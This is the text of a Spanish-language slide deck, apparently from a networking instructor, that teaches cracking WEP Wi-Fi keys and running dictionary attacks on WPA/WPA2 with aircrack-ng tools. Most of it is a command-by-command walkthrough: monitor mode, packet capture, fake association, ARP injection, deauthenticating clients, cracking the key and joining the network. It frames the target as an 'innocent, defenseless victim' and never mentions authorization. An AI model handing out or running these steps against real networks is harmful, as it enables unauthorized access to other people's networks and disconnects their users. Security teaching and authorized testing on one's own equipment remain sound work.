Paulo Coloms F.

Docente Universidad Tecnolgica de Chile Inacap

Instructor CCNA CCAI Cisco Networking Academy
www.redescisco.net

Objetivos

Seguridad en redes inalmbricas?

Seguridad en redes inalmbricas?

WPA2-AES
WPA2-TKIP
WPA-PSK
WEP 128
WEP 64
MAC Auth
Sin Seguridad

Seguridad en redes inalmbricas?

WPA2-AES
WPA2-TKIP
WPA-PSK
AQU
WEP 128
ATACAMOS
WEP 64
!
MAC Auth
Sin Seguridad

Algo de lenguaje
-- WEP = Wired Equivalent Privacy
-- WPA (No WAP) = WiFi Protected
Access
-- El verbo encriptar en espaol
no existe, ni menos
desencriptar ni ningn derivado.
El trmino correcto es cifrary
descifrar

Nuestro Kit de Herramientas

Tarjeta inalmbrica decente
Sistema operativo Unix
Drivers parchados para inyectar trfico en la red
Airodump-ng
Aireplay-ng
Wesside-ng (Opcional)
Aircrack-ng
Opcionales:
Kismet
Hydra
Airsniff
.otros

Sistema Operativo Unix

FreeBSD
OpenBSD
NetBSD
Solaris
Mac OSX
Linux
O algunos Linux previamente especializados en esta materia:

Backtrack 4
Wifiway
Wifislax

Ahora a lo que vinimos

Pasos para obtener una contrasea WEP

1. Configurar la tarjeta de red en modo monitor (promisc)
2. Escanear el aire en bsqueda de una red inalmbrica
interesante
3. Identificar una vctima inocente e indefensa
4. Comenzar a obtener tramas que contengan informacin
WEP y almacenarlas en un archivo.
5. Si la vctima se resiste, inyectarle trfico para generar
respuestas vulnerables
6. Crackear la contrasea WEP
7. Conectarse y ser feliz

Por qu es posible romper claves

WEP?

1. WEP se basa en el algoritmo

criptogrfico RC4 el cual es
conocido por sus
vulnerabilidades.
2. WEP enva parte de su trfico sin
cifrar lo que permite capturar
IVs (Vectores de Inicializacin)

Pasos para obtener una contrasea WEP

1. Configurar la tarjeta de red en modo monitor (promisc)

root@hacker:~# airmon-ng start wlan0

root@hacker:~# iwconfig

Pasos para obtener una contrasea WEP

2. Escanear el aire en bsqueda de una vctima en la interfaz
monitor.

root@hacker:~# airodump-ng mon0

Pasos para obtener una contrasea WEP

3. Una vez seleccionada la vctima capturamos los paquetes
de trfico que contengan IVs vlidos.

root@hacker:~#
airodump-ng c 1 w intento1 - -bssid 00:11:22:33:44:55 mon0

Donde:
-c = Canal donde se encuentra la vctima (del 1 al 14)
-w = Nombre con el que se guardar el archivo de capturas (.cap)
- - bssid = Direccin MAC del Access Point que queremos crackear

Pasos para obtener una contrasea WEP

4. Esperar que se junten al menos 20.000 IVs (Indicados en la
columna #Data). Como esto puede tomarnos mucho
tiempo, sobre todo si no hay trfico entre algn cliente
vlido y el AP, debemos entonces acelerar ese proceso. En
un nuevo terminal ejecutar:

root@hacker:~#
aireplay-ng -1 0 a 00:11:22:33:44:55 -e Hackme mon0
Donde:
-a = Direccin MAC del Access Point que queremos crackear.
-e = Nombre de la red (SSID) que queremos creackear.

Pasos para obtener una contrasea WEP

Se debe obtener un mensaje

Association Successful =) (AID: 1)

Pasos para obtener una contrasea WEP

5. Inyectar trfico ARP para acelerar la respuesta (ARP
Replies) desde el Access Point que contenga IV Vlidos
para poder crackear.

root@hacker:~#
aireplay-ng -3 -b 00:11:22:33:44:55 mon0

Pasos para obtener una contrasea WEP

Esperar que los IVs del Airodump
iniciado en el paso N 3 lleguen a los
100.000, aunque con 20.000 es posible
romper claves en ciertos casos.

Pasos para obtener una contrasea WEP

6. Cuando se tengan suficientes IVs se puede lanzar el
programa AirCrack sobre el archivo .cap almacenado
anteriormente.

root@hacker:~# aircrack intento1-01.cap

Pasos para obtener una contrasea WEP

Pasos para obtener una contrasea WEP

6. Una vez que se tenga la clave de la red Wireless, solo
queda conectarse mediante un gestor grfico o mediante
comandos.

iwconfig wlan0 mode managed

iwconfig wlan0 key s:admin
iwconfig wlan0 essid Hackme
dhclient wlan0
ping www.google.cl

Y las claves WPA/WPA2?

Aunque WPA se basa en el mismo algoritmo que WEP (RC4), esta es ms
segura por ahora para redes inalmbricas y no es posible directamente
crackear una contrasea WPA usando el mismo mtodo que WEP. Lo que s
se puede hacer es lanzar un ataque de diccionario (no de fuerza bruta) contra
esa red. Si la contrasea es bsica, la podemos sacar.

Esto solo funciona si es que hay algn cliente ya conectado a la red.

Atacar WPA consiste en desconectar al cliente y capturar los handshakes
de autenticacin.

Y las claves WPA/WPA2?

1. Capturar Handshakes
# airodump-ng c 1 w intento1 - -bssid 00:11:22:33:44:55 mon0
2. Forzar a un cliente a reconectarse a la red
# aireplay -0 5 -a 00:11:22:33:44:55 -c <MAC_CLIENTE> mon0
3. Una vez que se tengan los handshakes, correrle un ataque de
diccionario.
# aircrack a 2 b 00:11:22:33:44:55 w /ruta/al/wordlist.txt
Donde - -bssid, -a y b es la MAC de del Access Point vctima